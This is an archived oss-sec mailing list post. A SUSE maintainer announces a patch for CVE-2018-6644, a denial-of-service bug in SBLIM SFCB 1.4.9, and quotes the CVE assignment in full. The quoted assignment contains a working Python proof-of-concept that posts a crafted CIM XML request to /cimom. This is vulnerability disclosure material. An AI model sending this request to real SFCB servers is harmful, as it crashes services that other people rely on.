oss-sec mailing list archives
Re: Fw:Re: [scr459004] sfcb - 1.4.9
From: Marcus Meissner <meissner () suse de>
Date: Fri, 9 Feb 2018 10:34:44 +0100
Hi, Patch from our sblim-sfcb maintainer Adam Majer to fix this issue is attached. Ciao, Marcus On Wed, Feb 07, 2018 at 01:04:18PM +0800, XinleiHe wrote:
-------- Forwarding messages -------- From: cve-request () mitre org Date: 2018-02-06 04:11:55 To: hxl1999 () yeah net Cc: cve-request () mitre org Subject: Re: [scr459004] sfcb - 1.4.9 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 The CVE ID is below. Please inform the software maintainer that the CVE ID has been assigned.[Suggested description] SBLIM Small Footprint CIM Broker (SFCB) 1.4.9 has a null pointer (DoS) vulnerability via a crafted POST request to the /cimom URI. ------------------------------------------ [Additional Information] You can use following python code to reproduce this vulnerability. import httplib from xml.dom.minidom import Document class write_xml(Document): def __init__(self): Document.__init__(self) def set_tag(self,tag): self.tag = tag self.cim = self.createElement(self.tag) #self.setAttribute("encoding", "utf-8") self.cim.setAttribute("CIMVERSION", "2.0") self.cim.setAttribute("DTDVERSION", "2.0") self.appendChild(self.cim) self.msg = self.createElement("MESSAGE") self.msg.setAttribute("ID", "4711") self.msg.setAttribute("PROTOCOLVERSION","1.0") self.cim.appendChild(self.msg) self.sim = self.createElement("SIMPLEREQ") self.msg.appendChild(self.sim) self.ime = self.createElement("IMETHODCALL") self.ime.setAttribute("NAME","EnumerateInstances") self.sim.appendChild(self.ime) self.local = self.createElement("LOCALNAMESPACEPATH") self.ime.appendChild(self.local) self.names1=self.createElement("NAMESPACE") self.names1.setAttribute("NAME", "root") self.local.appendChild(self.names1) def display(self): print self.toprettyxml(indent=" ") def retdata(self): return self.toprettyxml(indent=" ") def httpreq(data): conn = httplib.HTTPConnection("127.0.0.1", 5988, False) conn.request('POST', '/cimom',data) res = conn.getresponse() def main(): wx = write_xml() wx.set_tag('CIM') print wx.retdata() print httpreq(wx.retdata()) if __name__=='__main__': main() ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] SBLIM project ------------------------------------------ [Affected Product Code Base] sfcb - 1.4.9 ------------------------------------------ [Impact Denial of Service] trueUse CVE-2018-6644. - -- CVE Assignment Team M/S M300, 202 Burlington Road, Bedford, MA 01730 USA [ A PGP key is available for encrypted communications at http://cve.mitre.org/cve/request_id.html ] -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCAAGBQJaeLorAAoJEHb/MwWLVhi2xdoP/2OaKyQzIatRABkB35IlzYpR vkjtDA8uXjMIcnuJr/sYa/zVFjIBRFQ2nLRkJs2d5Ni1uNsZ3hGm5A7Tn3RFsEby tL6CvtY8h0MBf4xf6ZVdkzwshJyb05qaOB7UfUL5Fskzoxvs2QpcbGKGtbtaKbPU YZq4t6aIyZW9UMEwheeCBDzGqC/oLVRUxgztgAy8SIhIlVfwtYEmHvafs11cN2XV EjVvIbaOeRlOfelJvlSKCOjHj0vjOesouiGlMLm3nqYXm5en/T66tuCpaajn4zzO I/Wj0Fm8tm2w0pkdfcNBewLu7+4bjRsiJ8U0SVPFQaOENvK7C3q6NyrfCgs1qesR fr4LS9TfOcuuIjxn9w3T0Hr4nOAJnSwTiwmnuKoQblA/Pn/r8CquyKh/Rh/ST6P7 YxLUt9ZzXKf2SlWV1q+68N9RvefoXQFgQdAP2eUG0Y2i8ACZmxCPVLMclwUHvYIG KFlei2bIp4IADt3zRdndQBzEK1NwFhNwIKSnE7ybRQqFx6yTgoEiOP0CpYZLmRqi g94pvunSBKqPcCNhW/C78orO0Tz7UegnkaBMNYgIgW/jCFEiFGSBgi4VIjW8WWrr M+BM/UGehRBbGjmRqphsOBHdc1H9VKUAWJ0Y4hzQAd5Y6QCcTWb0uMlbNMjINshR 4TNbCFPf5EWJy7Bw8Gic =q5wy -----END PGP SIGNATURE-----
-- Marcus Meissner,SUSE LINUX GmbH; Maxfeldstrasse 5; D-90409 Nuernberg; Zi. 3.1-33,+49-911-740 53-432,,serv=loki,mail=wotan,type=real <meissner () suse de>
Attachment:
set_default_content_type.patch
Description:
Current thread:
- Fw:Re: [scr459004] sfcb - 1.4.9 XinleiHe (Feb 06)
- Re: Fw:Re: [scr459004] sfcb - 1.4.9 Marcus Meissner (Feb 09)